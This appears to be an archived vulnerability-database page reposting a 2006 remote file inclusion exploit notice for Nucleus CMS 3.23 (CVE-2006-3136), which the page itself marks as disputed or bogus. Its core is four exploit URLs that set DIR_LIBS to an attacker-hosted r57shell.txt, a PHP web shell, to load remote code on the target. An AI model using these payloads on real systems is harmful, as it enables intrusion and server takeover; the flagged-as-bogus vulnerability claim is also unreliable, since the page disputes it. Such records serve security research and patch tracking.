file include exploits in nucleus 3.23

WARNING! Fake news / Disputed / BOGUS

file include exploits in nucleus 3.23

2006.06.23

Credit: gamr-14 hotmail com

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-3136

CWE: CWE-94

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

Multiple file include exploits in nucleus 3.23
script type : nucleus 3.23
bug found by : sweet-devil
team : site-down
type : file include
####################################################
exploits :
action.php
http://www.example.com/path/action.php?DIR_LIBS=http://yoursite/r57shell
.txt?
media.php
http://www.example.com/path/nucleus/media.php?DIR_LIBS=http://yoursite/r
57shell.txt?
server.php
http://www.example.com/path/nucleus/xmlrpc/server.php?DIR_LIBS=http://yo
ursite/r57shell.txt?
api_metaweblog.inc.php
http://www.example.com/path/nucleus/xmlrpc/api_metaweblog.inc.php?DIR_LI
BS=http://yoursite/r57shell.txt?
####################################################
#######################
emails:
gamr-14 (at) hotmail (dot) com [email concealed] & black-cod3 (at) hotmail (dot) com [email concealed]
#######################
All my respect to our friends , lezr.com
done .. peace

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

file include exploits in nucleus 3.23

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.